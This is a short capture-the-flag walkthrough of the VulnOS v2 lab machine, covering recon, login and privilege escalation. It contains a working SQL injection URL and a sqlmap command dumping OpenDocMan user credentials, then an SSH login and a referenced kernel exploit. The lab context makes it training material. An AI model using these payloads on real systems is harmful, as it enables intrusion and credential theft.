Download link — https://download.vulnhub.com/vulnos/VulnOSv2.7z
Nmap :- nmap -p- -sCV -A -v ip
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
| 2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
|_ 256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open irc ngircd
MAC Address: 08:00:27:F9:DD:0B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Uptime guess: 198.047 days (since Wed Nov 2 11:24:59 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernelOn visiting http we got a index page we got a hyperlink which redirect us to /jabc
At jabc we found Documentation menu on clicking it we found some text which were written in black ink so that it won’t be visible to a normal user but when we select all screen using (Ctrl+a) it shows the text giving us the credentials and the login id
Now let’s visit the page with the provided creds (guest:guest)
On loggin in we found a upload option but it’s doesn’t seems to be so useful because on bypassing upload filter we don’t know where the files are going so that we can execute it , so let’s search for OPENDOCMAN v1.2.7 version and we found a exploit on exploit-db , where we find that OPENDOCMAN is vulnerable to sql injection so after using this we can find database with the help of sqlmap
So let’s confirm the sql injection is working or not
http://10.0.0.6/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,v
ersion%28%29,3,4,5,6,7,8,9
YUP , it’s working and now we can move sqlmap to enumerate in a better way
sqlmap -u "http://192.168.1.42/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dumpHere i found the users creds and now let’s decrypt the has we found of webmin and got the decrypt hash as ‘ webmin1980’
Logging in to ssh with webmin creds
└──╼ #ssh webmin@10.0.0.16
webmin@10.0.0.16’s password:
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0–24-generic i686)* Documentation: https://help.ubuntu.com/System information as of Thu Oct 3 05:16:49 CEST 2019System load: 0.08 Memory usage: 4% Processes: 61
Usage of /: 5.4% of 29.91GB Swap usage: 0% Users logged in: 0Graph this data and manage this system at:
https://landscape.canonical.com/Last login: Wed Oct 2 06:24:15 2019 from 10.0.0.1
$ id
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)
$
So on enumerating found kernel to be vulnerable and found exploit at “https://www.exploit-db.com/download/37292” and transferred with the help of python server
And exploited it
……………………………………EASY…..………………………………….
